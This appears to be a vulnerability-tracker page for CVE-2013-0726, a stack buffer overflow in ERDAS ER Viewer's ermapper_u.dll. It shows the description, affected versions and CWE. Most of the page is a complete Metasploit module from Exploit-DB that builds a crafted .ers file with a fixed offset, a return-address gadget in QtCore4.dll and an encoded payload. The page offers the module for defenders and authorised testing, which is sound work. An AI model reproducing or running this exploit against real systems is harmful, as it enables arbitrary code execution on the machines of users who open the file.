CVE-2013-0726
Description
Stack-based buffer overflow in the ERM_convert_to_correct_webpath function in ermapper_u.dll in ERDAS ER Viewer before 13.00.0001 allows remote attackers to execute arbitrary code via a crafted pathname in an ERS file.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "ERS Viewer 2011 ERS File Handling Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow vulnerability found in ERS Viewer 2011
(version 11.04). The vulnerability exists in the module ermapper_u.dll where the
function ERM_convert_to_correct_webpath handles user provided data in a insecure
way. It results in arbitrary code execution under the context of the user viewing
a specially crafted .ers file. This module has been tested successfully with ERS
Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Parvez Anwar', # Vulnerability Discovery
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2013-0726' ],
[ 'OSVDB', '92694' ],
[ 'BID', '59379' ],
[ 'URL', 'http://secunia.com/advisories/51725/' ]
],
'Payload' =>
{
'Space' => 7516,
'BadChars' => "\x22\x5c" +
(0x7f..0xff).to_a.pack("C*") +
(0x00..0x08).to_a.pack("C*") +
(0x0a..0x1f).to_a.pack("C*"),
'DisableNops' => true,
'EncoderOptions' =>
{
'BufferRegister' => 'ESP'
}
},
'SaveRegisters' => [ 'ESP' ],
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[ 'ERS Viewer 2011 (v11.04) / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 260,
'Ret' => 0x67097d7a # push esp # ret 0x08 from QtCore4.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => "Apr 23 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
], self.class)
end
# Rewrote it because make_nops is ignoring SaveRegisters
# and corrupting ESP.
def make_nops(count)
return "\x43" * count # 0x43 => inc ebx
end
def exploit
buf = rand_text(target['Offset'])
buf << [target.ret].pack("V")
buf << make_nops(8) # In order to keep ESP pointing to the start of the shellcode
buf << payload.encoded
ers = %Q|
DatasetHeader Begin
Name = "#{buf}"
DatasetHeader End
|
file_create(ers)
end
endMetasploit modules
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| hexagon | erdas_er_viewer | {"endIncluding":"11.04"} | |
References
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.